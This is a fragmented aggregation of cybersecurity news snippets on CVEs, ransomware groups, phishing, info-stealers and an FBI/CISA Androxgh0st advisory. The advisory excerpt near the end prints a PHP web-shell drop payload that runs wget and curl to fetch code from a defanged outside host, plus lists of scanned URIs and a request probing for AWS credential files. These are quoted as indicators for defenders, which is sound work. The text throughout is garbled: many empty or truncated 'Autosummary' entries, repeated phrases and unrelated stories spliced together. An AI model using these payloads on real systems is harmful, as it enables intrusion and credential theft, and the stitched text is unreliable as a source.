sector-specific standards of the ISO/IEC 27001, these frameworks provide a structured and strategic approach to managing cybersecurity risks. CIS Critical Security Controls The CIS Critical Security … More
The post 10 cybersecurity frameworks you need to know about appeared first on Help Net Security.
"Autosummary:
Secure Controls Framework (SCF) The Secure Controls Framework (SCF) centers on internal controls, encompassing cybersecurity and data privacy-related policies, standards, procedures, technologies, and their related processes. CIS Critical Security Controls The CIS Critical Security Controls (CIS Controls) offer a straightforward, prioritized, and prescriptive collection of best practices for enhancing cybersecurity posture. "Tsurugi Linux is a heavily customized open-source distribution focused on supporting DFIR investigations. The project focuses mainly on live forensics analysis, post-mortem analysis, and digital evidence acquisition. Users can also perform malware analysis, OSINT and computer vision activities. “We’ve crafted a user-friendly experience, organizing the main menu in a logical forensic analysis sequence. Our menu is your roadmap from device acquisition to integrity checks, artifact extraction, and reporting tools. It’s not just about familiarity; it’s … More
The post Tsurugi Linux: Tailoring user experience for digital forensics and OSINT investigations appeared first on Help Net Security.
"Autosummary:
And for the seasoned experts, every tool is at your fingertips, ready to be wielded precisely through the command line console,” Giovanni Rattaro, Tsurugi Linux core developer, told Help Net Security. "Autosummary:
The flaw affects the following products: Bosch BCC101 CVE-2023-49722 Version(s): 4.13.20 – v4.13.33 (excluding) Bosch BCC102 CVE-2023-49722 Version(s): 4.13.20 – v4.13.33 (excluding) Bosch BCC50 CVE-2023-49722 Version(s): 4.13.20 – v4.13.33 (excluding) The vendor addressed the flaw with the release of the WiFi firmware 4.13.33 which closes the port 8899. "Autosummary:
“The attack vector included the scanning and identification of externally facing Mac services to include the Apple Filing Protocol (AFP, port 548), RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.” Durachinsky was charged with 16 counts, including accessing and damaging computers without authorization, accessing a non-public government computer without authorization, production of child pornography, three counts of wire fraud, four counts of aggravated identity theft, and five counts of illegal wiretapping.On January 4, 2017, Case Western Reserve University (CWRU), located in Cleveland, Ohio, became aware of an infection on more than 100 of its computers.In 2012, as a senior soon to graduate with a physics degree, he worked on a project with faculty member Robert W. Brown regarding nanoparticle behavior, assisting with software to visualize the behavior in 3D. However, Durachinsky was frequently in trouble for his other computing activities. "Autosummary:
All composed like this “BBCNEWS-{6 characters}.OMH4.XYZ” Clicking the play button takes you through several redirects, very likely to perform fingerprinting, where sites gather information about your browser, your location, and other sites you’ve visited. This post features a slightly different text: “I can’t believe this, I’m going to miss him so much” The BBC news logo in the picture and the BBCNEWS part of the URL are obviously intended to gain your trust, and suggest that it’s safe to play the video. "Autosummary:
CVE-2023-7028 (CVSS score 10 out of 10): an issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. "Autosummary:
"Inferno Drainer may have ceased its activity, but its prominence throughout 2023 highlights the severe risks to cryptocurrency holders as drainers continue to develop further," Andrey Kolmakov, head of Group-IB"s High-Tech Crime Investigation Department, said. "Autosummary:
The list of targets includes multiple Fortune 500 companies operating in various industry sectors, such as: Global government and military departments National telecommunications companies Defense contractors Technology firms Banking, finance, and accounting institutions Worldwide consulting services Aerospace, aviation, and engineering entities “Investigations of newly found compromised devices showed they had been backdoored with a slightly different variant of the GIFTEDVISITOR webshell documented in the “visits.py modification – GIFTEDVISITOR” section of Volexity’s recent blog post. "Autosummary:
How hackers are harnessing the power of AI Hackers are leveraging AI tools to augment their cybercrimes, enhancing the success, scale, and scope of their attacks in various ways, including: Improving social engineering tactics: Hackers are using AI to enhance the quality of their social engineering content.By leveraging AI, they can generate grammatically accurate and error-free web content, text messages, phishing emails, and even highly convincing voicemails. "Autosummary:
"Autosummary:
Last year, Google fixed eight Chrome zero-day bugs exploited in attacks tracked as CVE-2023-7024, CVE-2023-6345, CVE-2023-5217, CVE-2023-4863, CVE-2023-3079, CVE-2023-4762, CVE-2023-2136, and CVE-2023-2033. "Autosummary:
"The Calvià City Council is working to restore normality as soon as possible, after having been the target, in the early hours of last Saturday, of a ransomware cyberattack, through which they intend to extort the council," says the announcement from Calvià. "Autosummary:
RCE flaws targeted in these attacks include CVE-2017-9841 (PHPUnit), CVE-2021-41773 (Apache HTTP Server), and CVE-2018-15133 (Laravel). "Autosummary:
The list of Netscaler product versions affected by these two zero-day vulnerabilities includes the following: NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35 NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21 NetScaler ADC 13.1-FIPS before 13.1-37.176 NetScaler ADC 12.1-FIPS before 12.1-55.302 NetScaler ADC 12.1-NDcPP before 12.1-55.302 According to data provided by threat monitoring platform Shadowserver, just over 1,500 Netscaler management interfaces are now exposed on the Internet. "Autosummary:
"Cyber threats targeting government organizations have become increasingly sophisticated, posing significant risks to national security, public infrastructure, and sensitive data. These threats are diverse in nature, originating from various actors such as nation-states, hacktivist groups, and organized cybercrime entities. Governments must invest in robust cybersecurity measures, including advanced threat detection systems, employee training programs, and the continuous monitoring of critical infrastructure. Additionally, international cooperation and information sharing are crucial to combating threats that transcend national … More
The post Government organizations’ readiness in the face of cyber threats appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"For years, phishing was just a numbers game: A malicious actor would slap together an extremely generic (and usually poorly-written) email and fire it out to thousands of recipients in the hope that a few might take the bait. Over time, however, as spam filters and other email security tools became increasingly effective at filtering out such emails, threat actors adapted and began leveraging new techniques to circumvent these technologies. Common among these new techniques … More
The post Flipping the BEC funnel: Phishing in the age of GenAI appeared first on Help Net Security.
"Autosummary:
Over time, as these tools are exposed to more and more of an organization’s communications, the better they become at detecting such anomalies, such as word choice, syntax, sentence structure, and length, along with countless other parameters that a human reader would most likely overlook. All told, AI-enabled tools offer unparalleled adaptability, efficiency, and detection capabilities — all while making life easier for the often overworked, overwhelmed, and understaffed SOC teams that remain so essential to our world’s collective security posture.From there, organizations can offer more targeted training simulations tailored to each employee, based on their experience, knowledgeability, department, title, and so on.Additionally, these tools expedite open-source intelligence (OSINT) gathering by swiftly collecting information about targets, including personal details, preferences, behaviors, and comprehensive company data. "Autosummary:
Akamai, which also published its own retrospective on DDoS Trends in 2023, said "DDoS attacks became more frequent, longer, highly sophisticated (with multiple vectors), and focused on horizontal targets (attacking multiple IP destinations in the same attack event). "Autosummary:
"When successfully exploited, this vulnerability may let attackers perform any action the logged‑in administrator they targeted is allowed to do on the targeted site, including installing arbitrary plugins, and creating new rogue Administrator users," "Autosummary:
In the recent wave of attacks, if threat actors detect logged-in admin cookies, they exploit the issue to install and activate a rogue backdoor plugin (“wp-felody.php” or “Wp Felody”) and load a second-stage payload from specialcraftbox[.]com. "Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
As BBC News reports, fraudsters are combing online forums where desperate owners post messages about their lost pets, and then demand thousands of pounds in "reward" for the animal"s safe return. "A vulnerability (CVE-2023-36025) that Microsoft fixed in November 2023 continues to be exploited by malware peddlers: this time around, the delivered threat is a variant of the Phemedrone Stealer. About the malware Phemedrone Stealer is a piece of malware written in C#, with no dependencies. It’s capable of: Collecting system information (hardware, OS, geolocation) and making screenshots Gathering all data contained in the targed device’s memory Grabbing user files from specific folders (e.g., Documents, Desktop) … More
The post Windows SmartScreen bug exploited to deliver powerful info-stealer (CVE-2023-36025) appeared first on Help Net Security.
"Autosummary:
Grabbing cookies, passwords, and autofills from Chromium-based browsers (Google Chrome, Microsoft Edge, Opera, Brave, etc.) and Gecko-based browsers (e.g., Firefox) "Autosummary:
"This is exactly what an attacker needs – an unsafe, forgotten, vulnerable to code injection asset, and most importantly, has access to (very) high permission native browser API." "Autosummary:
Evasion T1564 - Hide Artifacts Discovery T1083 - File and Directory Discovery Discovery T1010 - Application Window Discovery Discovery T1082 - System Information Discovery Discovery T1057 - Process Discovery Discovery T1518.001 - Security Software Discovery Initial Access T1566-Phishing Collection T1005 - Data from Local System Collection T1119 - Automated Collection Resource Development T1587 - Develop Capabilities Resource Development T1583-Acquire Infrastructure Execution T1129 - Shared Modules Execution T1059 - Command and Scripting Interpreter Reconnaissance T1595- Active Scanning Reconnaissance T1598-Phishing for Information The Akira Group The Akira Group, was discovered in March 2023 and has claimed 81 victims to date. Known TTPs Tools Tactics Exfiltration T1567 - Exfiltration Over Web Service Initial Access T1566.001 - Spearphishing Attachment Exfiltration T1041 - Exfiltration Over C2 Channel Exfiltration T1537 - Transfer Data to Cloud Account Collection T1114.001 - Local Email Collection Impact T1486 - Data Encrypted for Impact Initial Access T1566.002 - Spearphishing Link Execution T1059.001 - PowerShell Execution T1569.002 - Service Execution Discovery T1016.001 - Internet Connection Discovery Initial Access T1078 - Valid Accounts Privilege Escalation T1078 - Valid Accounts DefenseIn 2024, Cyberint anticipates several of these newer groups to enhance their capabilities and emerge as dominant players in the industry alongside veteran groups like LockBit 3.0, Cl0p, and AlphV. Read Cyberint"s 2023 Ransomware Report for the top targeted industries and countries, a breakdown of the top 3 ransomware groups, ransomware families worth noting, newcomers to the industry, notable 2023 campaigns, and 2024 forecasts. Known TTPs Tools Tactics Resource Development T1650 - Acquire Access Collection T1560 - Archive Collected Data Impact T1565.001 - Stored Data Manipulation Collection T1532 - Archive Collected Data Collection T1005 - Data from Local System Rhysida Ransomware The Rhysida ransomware group came into the spotlight in May/June 2023 when they launched a victim support chat portal accessible through their TOR (.onion) site. "Autosummary:
“Despite having been patched, threat actors continue to find ways to exploit CVE-2023-36025 and evade Windows Defender SmartScreen protections to infect users with a plethora of malware types, including ransomware and stealers like Phemedrone Stealer.” concludes the report. "Autosummary:
Trend Micro reports that Phemedrone targets the following apps/data: Chromium browsers : Harvests passwords, cookies, and autofill from browsers and security apps like LastPass, KeePass, Microsoft Authenticator, and Google Authenticator. Malicious URL file used in Phemedrone campaign Source: BleepingComputer The DLL is a PowerShell loader that fetches a ZIP file from a GitHub repository containing the second-stage loader masqueraded as a PDF file (Secure.pdf), a legitimate Windows binary (WerFaultSecure.exe), and "wer.dll," used in DLL side-loading and to establish persistence. "Autosummary:
The victim calls the phone number listed on the email, and from there, the scammers direct them to perform various actions such as installing remote access software on their computers, infecting themselves with malware, and entering their account credentials on a phishing page. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Social engineer reveals effective tricks for real-world intrusions In this Help Net Security interview, Jayson E. Street, Chief Adversarial Officer at Secure Yeti, discusses intriguing aspects of social engineering and unconventional methods for gathering target information. Understanding zero-trust design philosophy and principles In this Help Net Security interview, Phil Vachon, Head of Infrastructure in the Office of the CTO at … More
The post Week in review: GitLab account takeover flaw, attackers exploiting Ivanti Connect Secure zero-days appeared first on Help Net Security.
"Autosummary:
Ivanti Connect Secure zero-days exploited by attackers (CVE-2023-46805, CVE-2024-21887) Two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Ivanti Connect Secure VPN devices are under active exploitation by unknown attackers, Volexity researchers have discovered.Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Social engineer reveals effective tricks for real-world intrusions In this Help Net Security interview, Jayson E. Street, Chief Adversarial Officer at Secure Yeti, discusses intriguing aspects of social engineering and unconventional methods for gathering target information. "Autosummary:
"Autosummary:
Rebooting the device terminates all temporary states, processes, or activities that could be exploited and requires authentication like PIN, password, or biometric verification to unlock, thereby re-engaging all security mechanisms. "Autosummary:
Below is the Cyber Kill Chain for the overall attack described in the report: “To this day, there is no clear explanation of how the attackers had the necessary information, but we can state that among the 300 members, they did not miss a single shot.” continues the report. On April 25, 2023, Zyxel disclosed a critical vulnerability (CVSS score 9.8), tracked as CVE-2023-28771, in a number of their firewalls. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Akira ransomware targets Finnish organizations Pierluigi Paganini January 13, 2024 January 13, 2024 The Finish National Cybersecurity Center (NCSC-FI) warns of increased Akira ransomware attacks targeting NAS and tape backup devices of organizations in the country. "Autosummary:
"Autosummary:
Here’s a summary of the tools used in the attacks: Zipline Passive Backdoor : custom malware that can intercept network traffic, supports upload/download operations, creating reverse shells, proxy servers, server tunneling : custom malware that can intercept network traffic, supports upload/download operations, creating reverse shells, proxy servers, server tunneling Thinspool Dropper : custom shell script dropper that writes the Lightwire web shell onto Ivanti CS, securing persistence : custom shell script dropper that writes the Lightwire web shell onto Ivanti CS, securing persistence Wirefire web shell : custom Python-based web shell supporting unauthenticated arbitrary command execution and payload dropping : custom Python-based web shell supporting unauthenticated arbitrary command execution and payload dropping Lightwire web shell : custom Perl web shell embedded in a legitimate file, enabling arbitrary command execution : custom Perl web shell embedded in a legitimate file, enabling arbitrary command execution Warpwire harverster : custom JavaScript-based tool for harvesting credentials at login, sending them to a command and control (C2) server : custom JavaScript-based tool for harvesting credentials at login, sending them to a command and control (C2) server PySoxy tunneler : facilitates network traffic tunneling for stealthiness : facilitates network traffic tunneling for stealthiness BusyBox : multi-call binary combining many Unix utilities used in various system tasks : multi-call binary combining many Unix utilities used in various system tasks Thinspool utility (sessionserver.pl): used to remount the filesystem as ‘read/write’ to enable malware deployment "ZIPLINE is the most notable of these families, it is a passive backdoor that hijacks an exported function accept() from libsecure\.so. "“The Akira ransomware malware, which was first detected in Finland in June 2023, has been particularly active at the end of the year,” the Finnish National Cybersecurity Center (NCSC-FI) has shared on Wednesday. NCSC-FI has received 12 reports of Akira ransomware hitting Finnish organizations in 2023, and three of the attacks happened during Christmas vacations. “Of the ransomware malware cases reported to the Cybersecurity Center in December, six out of seven involved Akira family malware,” … More
The post Akira ransomware attackers are wiping NAS and tape backups appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Due to certain sections of the device being read-only, UNC5221 leveraged a Perl script (sessionserver.pl) to remount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes the web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling," the company said. "Autosummary:
As many as 74 organizations, mostly in the U.S., the U.K., France, Italy, Spain, and India, are estimated to have been impacted by the ransomware in 2023. "Autosummary:
Advanced BAS platforms provide practical recommendations, such as prevention signatures and detection rules that can be directly incorporated into security controls - including IPS, NGFW, WAF, EDR, SIEM, SOAR, and other security solutions - to strengthen your security posture immediately.As new malware variants, TTPs, exploit techniques, APT campaigns, and other emerging threats come to light, they are incorporated into the BAS tool"s threat intelligence library.Establish a cadence - whether daily, weekly, monthly, or in real-time following significant IT or threat landscape changes - to remain a step ahead of adversaries who continuously refine their tactics. "Autosummary:
"Autosummary:
The following versions are impacted: 16.1 prior to 16.1.5 16.2 prior to 16.2.8 16.3 prior to 16.3.6 16.4 prior to 16.4.4 16.5 prior to 16.5.6 16.6 prior to 16.6.4 16.7 prior to 16.7.2 The flaw was addressed in GitLab versions 16.7.2, 16.5.6, and 16.6.4, and the fix has also been backported to 16.1.6, 16.2.9, and 16.3.7. "Autosummary:
"Autosummary:
This means that Federal Civilian Executive Branch (FCEB) agencies need to remediate this vulnerability by January 29, 2024 in order to protect their devices against active threats. Secure your CMS There are a few obvious and easy-to-remember rules to keep in mind if you want to use a CMS without compromising your security. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @malwrhunterteam, @fwosar, @BleepinComputer, @serghei, @demonslay335, @Ionut_Ilascu, @Seifreed, @billtoulas, @AWNetworks, @Securonix, @TalosSecurity, @criptoboi, @pcrisk, @TrendMicro, and @Unit42_Intel. Cybersecurity researchers are back from the holidays, sharing new research on a BlackBasta affiliate"s use of PikaBot, Microsoft SQL servers being targeted by the Mimic ransomware, and threat actors impersonating security researchers to offer victims a chance to hack back at ransomware gangs. "Microsoft has eased us into the new new year with just 48 updates for the Windows, Office and .NET platforms. There were no zero-days for January, and no reports of publicly exposed vulnerabilities or exploited security issues.
Developers of complex, line-of-business applications might need to pay particular attention to how Microsoft has updated the Message Queue system. Printing has been patched and minor updates to bluetooth and Windows shell sub-systems (shortcuts and wallpaper) require some testing before deployment.
The team at Readiness has crafted a useful infographic that outlines the risks associated with each of the updates for this January release.
Autosummary:
To test your distributed, MSMQ, and RPC-driven corporate apps (you know who you are) please ensure that the following component areas are included in your project test and release schedule: Message Queue (MSMQ) Services . Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge). Adobe Reader (if you get this far) No updates from Adobe for Reader or Acrobat this month but Microsoft has released a single update to the third party database engine SQLite (CVE-2022-35737).These (BLF) file types were updated this month, and a Windows Error Log Reporting file test will be required that includes file create, read, update, and delete operations. REMINDER: Home, Pro, Pro Education, and Pro for Workstation editions of Windows 11, version 21H2 reached end of service on Oct. 10, 2023. With only two patches (CVE-2024-20674 and CVE-2024-20700) rated critical and no reported zero-days, this is another relatively light month. "Autosummary:
"The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.
The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s
Autosummary:
/current /demo /api /backup /beta /cron /develop /Laravel /laravel/core /gists/cache /test.php /info.php //.env /admin-app/.env%20 /laravel/.env%20 /shared/.env%20 /.env.project%20 /apps/.env%20 /development/.env%20 /live_env%20 /.env.development%20 Targeted URIs for web-shell drop: /.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php //lib/phpunit/phpunit/Util/PHP/eval-stdin.php //lib/phpunit/src/Util/PHP/eval-stdin.php //lib/phpunit/Util/PHP/eval-stdin.php //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //phpunit/phpunit/src/Util/PHP/eval-stdin.php //phpunit/phpunit/Util/PHP/eval-stdin.php //phpunit/src/Util/PHP/eval-stdin.php //phpunit/Util/PHP/eval-stdin.php //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php //vendor/phpunit/src/Util/PHP/eval-stdin.php //vendor/phpunit/Util/PHP/eval-stdin.php //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/phpunit/Util/PHP/eval-stdin.php /lib/phpunit/phpunit/Util/PHP/eval stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/src/Util/PHP/eval-stdin.php /lib/phpunit/Util/PHP/eval-stdin.php /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /phpunit/phpunit/src/Util/PHP/eval-stdin.php /phpunit/phpunit/Util/PHP/eval-stdin.php /phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php /phpunit/src/Util/PHP/eval-stdin.php ./phpunit/Util/PHP/eval-stdin.php /phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.dev /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/src/Util/PHP/eval-stdin.php /vendor/phpunit/Util/PHP/eval-stdin.php /vendor/phpunit/Util/PHP/eval-stdin.php%20 /phpunit/phpunit/src/Util/PHP/eval-stdin.php /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php An example of attempted credential exfiltration through (honeypot) open proxies: POST /.aws/credentials HTTP/1.1 host: www.example.com user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 accept-encoding: gzip, deflate accept: */* connection: keep-alive content-length: 20 content-type: application/x-www-form-urlencoded 0x%5B%5D=androxgh0st An example of attempted web-shell drop through (honeypot) open proxies: GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php Monikers used instead of Androxgh0st (0x%5B%5D=???): Ridho Aws 0x_0x x_X nopebee7 SMTPEX evileyes0 privangga drcrypter errorcool drosteam androxmen crack3rz b4bbyghost 0x0day janc0xsec blackb0x 0x1331day Graber Example malware drops through eval-stdin.php: hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt 59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4 hxxps://chainventures.co[.]uk/.well-known/aas dcf8f640dd7cc27d2399cce96b1cf4b75e3b9f2dfdf19cee0a170e5a6d2ce6b6 hxxp://download.asyncfox[.]xyz/download/xmrig.x86_64 23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066 hxxps://pastebin[.]com/raw/zw0gAmpC ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72 hxxp://raw.githubusercontent[.]com/0x5a455553/MARIJUANA/master/MARIJUANA.php 0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef hxxp://45.95.147[.]236/tmp.x86_64 6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc hxxp://main.dsn[.]ovh/dns/pwer bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7 hxxp://tangible-drink.surge[.]sh/configx.txt de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.HTTP/1.1 host: www.example.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.76 accept-encoding: gzip, deflate accept: */* connection: keep-alive x-forwarded-for: 200.172.238.135 content-length: 279 <?php file_put_contents("evil.php",file_get_contents("hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt")); system("wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;curl hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php"); ?> Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include: /info /phpinfo /phpinfo.php /?phpinfo=1 /frontend_dev.php/$ /_profiler/phpinfo /debug/default/view?panel=config /config.json /.json /.git/config /live_env /.env.dist /.env.save /environments/.env.production /.env.production.local /.env.project /.env.development /.env.production /.env.prod /.env.development.local /.env.old /<insert-directory>/.env Note: the actor may attempt multiple different potential URI endpoints scanning for the .env file, for example /docker/.env or /local/.env . INDICATORS OF COMPROMISE (IOCs) Based on investigations and analysis, the following requests are associated with Androxgh0st activity: Incoming GET and POST requests to the following URIs: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php /.env Incoming POST requests with the following strings:/vendor folders are subject to malicious HTTP POST requests to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php uniform resource identifier (URI). Scan the server’s file system for unrecognized PHP files , particularly in the root directory or /vendor/phpunit/phpunit/src/Util/PHP folder. /.aws/credentials /aws/credentials /.aws/config /.git Download the PDF version of this report: For a downloadable copy of IOCs, see: TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Maria Varmazis – @mvarmazis Episode links: Sponsored by: Kolide – Kolide ensures that if your device isn’t secure it can’t access your cloud apps. "In this Help Net Security, Alexander Hagenah, Head of Cyber Controls at SIX, discusses the critical steps in creating effective offensive security operations and their impact on organizational security strategies. What are the critical steps in creating effective offensive security operations, and how do they impact an organization’s security strategy? The art of war in cybersecurity, much like Sun Tzu’s teachings, hinges on knowing the enemy. But it’s not just about knowing – it’s about … More
The post Embracing offensive cybersecurity tactics for defense against dynamic threats appeared first on Help Net Security.
"Autosummary:
In this Help Net Security, Alexander Hagenah, Head of Cyber Controls at SIX, discusses the critical steps in creating effective offensive security operations and their impact on organizational security strategies. While it’s challenging to match their resources, focusing on agility, smart intelligence gathering, and collaborative defense strategies can provide effective countermeasures.By pooling resources, knowledge, and intelligence, a coalition approach facilitates a more comprehensive and effective response to cyber threats. "Autosummary:
"The information and credentials collected by the attacker allowed them to pivot to a handful of systems internally, and ultimately gain unfettered access to systems on the network," Volexity researchers Matthew Meltzer, Robert Jan Mora, Sean Koessel, Steven Adair, and Thomas Lancaster said. "Autosummary:
"Autosummary:
"Two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Ivanti Connect Secure VPN devices are under active exploitation by unknown attackers, Volexity researchers have discovered. Patches for these flaws are currently unavailable, but the risk of exploitation can be mitigated by importing mitigation.release.20240107.1.xml file via Ivanti’s download portal. About the vulnerabilities (CVE-2023-46805 and CVE-2024-21887) The two security flaws affect all supported versions (v9.x and 22.x) of Ivanti Connect Secure (ICS) – formerly known as Pulse Connect Secure – … More
The post Ivanti Connect Secure zero-days exploited by attackers (CVE-2023-46805, CVE-2024-21887) appeared first on Help Net Security.
"Autosummary:
In this particular incident, the attacker leveraged these exploits to steal configuration data, modify existing files, download remote files, and reverse tunnel from the ICS VPN appliance,” Volexity incident responders shared. "Autosummary:
The observed post-compromise activity includes mapping the network, targeting backups and critical servers, stealing usernames and passwords from Windows servers, encrypting important files, and encrypting disks of virtual machines on virtualization servers, particularly those using VMware products. "Autosummary:
The vulnerability in question is CVE-2023-51467 (CVSS score: 9.8), a bypass for another severe shortcoming in the same software (CVE-2023-49070, CVSS score: 9.8) that could be weaponized to bypass authentication and remotely execute arbitrary code. "Autosummary:
Phishing uses deceptive communications - emails, text messages, and voice messages- to trick users into revealing sensitive information, including login credentials, passwords, one-time passwords, personal information, and clicking on phony approval messages.Unlike traditional MFA, attackers simply can"t bypass next-gen MFA with malware, MFA fatigue attacks, adversary-in-the-middle (AiTM) attacks, and other methods.These cutting-edge biometric wearables also protect organizations against BYOD vulnerabilities, lost and stolen credentials, weak passwords, credential stuffing, MFA prompt bombing, and easily stolen SMS one-time passcodes. "Autosummary:
“The wide availability and low cost of many drainers, combined with a relatively high potential for profit, likely makes them attractive operations for many financially motivated actors.” concludes the report that includes YARA Rule for the detection of the CLINKSINK drainer activity “Given the increase in cryptocurrency values and the low barrier to entry for draining operations, we anticipate that financially motivated threat actors of varying levels of sophistication will continue to conduct drainer operations for the foreseeable future.”X Account of leading cybersecurity firm Mandiant was hacked because not adequately protected Pierluigi Paganini January 11, 2024 January 11, 2024 The X account of cybersecurity firm Mandiant was likely hacked through a brute-force password attack, the company revealed. "Autosummary:
"Autosummary:
